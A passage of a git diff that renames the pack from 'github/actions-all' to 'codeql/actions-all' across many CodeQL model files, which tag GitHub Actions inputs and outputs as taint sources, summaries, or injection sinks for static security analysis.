100644 --- a/ql/lib/ext/manual/mikefarah_yq.model.yml +++ b/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml index 59c6e39515e..09a9673ee89 100644 --- a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml index 06371eebae2..d3b34019844 100644 --- a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml index a12a478d9bd..59cf5d2cf02 100644 --- a/ql/lib/ext/manual/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/manual/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml index 28357d5f468..4664937e6bc 100644 --- a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml index cfdff1898ae..28dd99378bf 100644 --- a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml index f4ad5f7292b..7ca3034593b 100644 --- a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml index 872b4e243d7..8af1107d686 100644 --- a/ql/lib/ext/manual/nanasess_setup-php.model.yml +++ b/ql/lib/ext/manual/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml index bd53ab3d65a..86c0bb7ccfb 100644 --- a/ql/lib/ext/manual/nick-fields_retry.model.yml +++ b/ql/lib/ext/manual/nick-fields_retry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml index db650eeb7c7..df140b9e570 100644 --- a/ql/lib/ext/manual/octokit_graphql-action.model.yml +++ b/ql/lib/ext/manual/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/manual/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml index 34d63f31ca8..f0f684aa4ca 100644 --- a/ql/lib/ext/manual/octokit_request-action.model.yml +++ b/ql/lib/ext/manual/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml index 02d6d804699..8149f79fa64 100644 --- a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml index 46fb5fd7dd6..4f2b95eac61 100644 --- a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml index d1d930168dc..8abafc6ae7d 100644 --- a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml +++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"] diff --git a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml index 0aab8b94632..f0dcfa3ea4e 100644 --- a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml index 62bb26ba1ff..2268d00d332 100644 --- a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml index 14bd9a7875a..ab55b9b6214 100644 --- a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml +++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] diff --git a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml index dfacbbc14f4..1ec53228c16 100644 --- a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml index 0acee71af26..97564731d2c 100644 --- a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml +++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"] diff --git a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml index b258b619b6c..b43c1327657 100644 --- a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml index 76b0c1d7d32..d9edf347c33 100644 --- a/ql/lib/ext/manual/py-actions_flake8.model.yml +++ b/ql/lib/ext/manual/py-actions_flake8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml index 587519e948b..ce637b1b0c5 100644 --- a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml index 58cbf9cc742..95d63525c57 100644 --- a/ql/lib/ext/manual/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/manual/pyo3_maturin-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml index cc39018b9b1..d89f4582f67 100644 --- a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml index 3d92eaef263..27130231df9 100644 --- a/ql/lib/ext/manual/read-file-actions.model.yml +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"] diff --git a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml index a0b5bc0dee4..9157cec03dd 100644 --- a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml index 89d91208ad4..359c3b0e222 100644 --- a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml index 5b2e5d9c4eb..8534ccc599a 100644 --- a/ql/lib/ext/manual/release-kit_regex.model.yml +++ b/ql/lib/ext/manual/release-kit_regex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml index 65a4cc60652..136e4aa9e41 100644 --- a/ql/lib/ext/manual/renovatebot_github-action.model.yml +++ b/ql/lib/ext/manual/renovatebot_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml index 281602cf0c7..428115a7bd7 100644 --- a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml +++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/Rishabh510/Path-lister-action diff --git a/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml index d82962aa096..be313c01711 100644 --- a/ql/lib/ext/manual/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/manual/roots_issue-closer-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml index 32622271d6a..74e55a9bf4e 100644 --- a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml index 8dbc5ee2ade..785616390b3 100644 --- a/ql/lib/ext/manual/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/manual/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml index 0bbd6364b5e..06de2990adf 100644 --- a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml index 6d6ec4a393e..a2ca3eae784 100644 --- a/ql/lib/ext/manual/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/manual/sergeysova_jq-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml index 78737c6bb8b..962c7431b75 100644 --- a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml index 64d5aac33ab..ebe62b37a6f 100644 --- a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml index c921df3fa7d..64d8ec1b7a5 100644 --- a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml index 623483db63e..49ba12d47a2 100644 --- a/ql/lib/ext/manual/snow-actions_eclint.model.yml +++ b/ql/lib/ext/manual/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml index 5184c3c4c48..396c480c4cd 100644 --- a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml index c898d41c838..129c8beb020 100644 --- a/ql/lib/ext/manual/step-security_harden-runner.model.yml +++ b/ql/lib/ext/manual/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml index d7c874c7787..343c0efe42a 100644 --- a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml index 7daafbc2fd8..6ca3eb0c160 100644 --- a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/the-coding-turtle/ga-file-list diff --git a/ql/lib/ext/manual/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml index 398dfb5c766..956c9afc8e4 100644 --- a/ql/lib/ext/manual/tibdex_backport.model.yml +++ b/ql/lib/ext/manual/tibdex_backport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml index a0dfb648875..e49643d1f15 100644 --- a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml +++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] diff --git a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml index 872964f8215..c9b65a30379 100644 --- a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml index 56f017635ce..386142a2d12 100644 --- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml index 73fd66c11b9..3cfedbdec2c 100644 --- a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml +++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] diff --git a/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml index 79a12582e9e..9d5b8b88ce2 100644 --- a/ql/lib/ext/manual/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/manual/trilom_file-changes-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml index a534e3dfcf7..3893986830a 100644 --- a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml index dfaa2e2687d..f2f99cc744a 100644 --- a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml index f87beb15018..5a226f12103 100644 --- a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml index 59cc155b550..d3e1daae67a 100644 --- a/ql/lib/ext/manual/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/manual/veracode_veracode-sca.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml index 38d892966d4..91a9ad11aa6 100644 --- a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml +++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/w3f/action-find-old-files diff --git a/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml index 52dcff39903..b1f8b91a22d 100644 --- a/ql/lib/ext/manual/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/manual/wearerequired_lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml index f9e122c17a9..48b11c1c5b2 100644 --- a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml index bfbd4e2f729..1ed8c0fd3f7 100644 --- a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml +++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml index e4b34c37d70..bfbd1dd12e6 100644 --- a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml index c65f7b1055f..db61e9171a8 100644 --- a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml +++ 